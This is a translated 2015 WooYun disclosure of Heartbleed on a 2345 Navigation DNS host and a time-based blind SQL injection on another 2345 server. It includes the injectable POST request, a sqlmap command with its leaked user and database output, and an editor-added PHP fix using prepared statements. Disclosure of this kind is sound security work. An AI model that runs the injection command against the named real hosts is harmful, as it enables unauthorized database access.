2345 Navigation: OpenSSL Heartbleed on the DNS operations site and MySQL injection on another site

ID: 94182
URL: http://www.wooyun.org/bug.php?action=view&id=94182
Status: Confirmed by vendor
Title: 2345 Navigation: OpenSSL Heartbleed on the DNS operations site and MySQL injection on another site
Type: System/service patches not applied in time
Vendor: 2345网址导航 (2345 Web Navigation)
White hat: lijiejie
Submitted: 2015-01-27 16:12:00
Disclosed: 2015-03-13 16:14:00
Fix time: (not set)
Confirmed: 2015-01-28 00:00:00
Confirm spend: 1
Tags:
Followers: 0
Bookmarks: 0
White hat rating:
White hat self-rated rank: 10
Vendor rating:
Vendor rank: 5
Summary
The 2345 Navigation DNS operations platform is affected by OpenSSL Heartbleed; a second site has a MySQL injection.
Details

OpenSSL Heartbleed vulnerability:

183.136.203.191	191dns.ruichuang.net


2345's internal systems use the domain ruichuang.net.
The SQL injection is at:

POST http://183.136.203.105/help/detail.php
act=feedback&id=1*&val=2


The id parameter is injectable (time-based blind). This host is actually jifen.2345.com, but the injection on the production site has already been fixed.

PoC

OpenSSL Heartbleed: the leaked server memory contained HTTP request headers for 191dns.ruichuang.net and a SOAP request body.



SQL injection:

sqlmap.py -u "http://183.136.203.105/help/detail.php" --data="act=feedback&id=1*&val=2"  --dbms=MySQL --current-user
current user: '[email protected]%'
current database: 'my_2345'

Remediation

Upgrade OpenSSL.
Validate and filter the request parameters.
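A hardened form of the detail.php feedback lookup, added here as an illustration and not 2345's own code: the id parameter is validated as a positive integer and bound through a PDO prepared statement, so input such as "1*" or a time-based payload is rejected instead of being spliced into the query. The table, column, host and credential names are placeholders.

```php
<?php
// Assumed shape of /help/detail.php (act=feedback&id=...&val=...).
// Editor-added example; table/column/host/credential names are placeholders.
declare(strict_types=1);

function openDb(): PDO {
    // Emulated prepares are disabled so MySQL receives SQL text and values separately.
    return new PDO(
        'mysql:host=127.0.0.1;dbname=my_2345;charset=utf8mb4',
        'app_user',                       // placeholder account
        getenv('DB_PASS') ?: '',          // placeholder secret source
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false,
        ]
    );
}

function parseId(array $post): ?int {
    // Accept only a plain positive integer; "1*", "1 AND SLEEP(5)" etc. fail here.
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function feedbackDetail(PDO $pdo, int $id): ?array {
    // Placeholder table; the bound value never becomes part of the SQL string.
    $stmt = $pdo->prepare('SELECT id, title, content FROM feedback WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

if (($_POST['act'] ?? '') === 'feedback') {
    $id = parseId($_POST);
    if ($id === null) {
        http_response_code(400);      // reject malformed id before touching the database
        exit('invalid id');
    }
    header('Content-Type: application/json');
    echo json_encode(feedbackDetail(openDb(), $id));
}
```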

Status history
2015-01-27: Details sent to the vendor, awaiting vendor response
2015-01-28: Vendor confirmed; details disclosed to the vendor only
2015-02-07: Details disclosed to core white hats and domain experts
2015-02-17: Details disclosed to regular white hats
2015-02-27: Details disclosed to intern white hats
2015-03-13: Details disclosed to the public
Vendor reply: Thank you for your attention to 2345; the issue will be fixed as soon as possible.
Response info: Severity: Low; Vulnerability rank: 5; Confirmed: 2015-01-28 11:36
Comments (comment | commenter | likes | time)

2345 Navigation, lijiejie has had his eye on you for a long time | 动后河 | 0 | 2015-01-27 16:45:00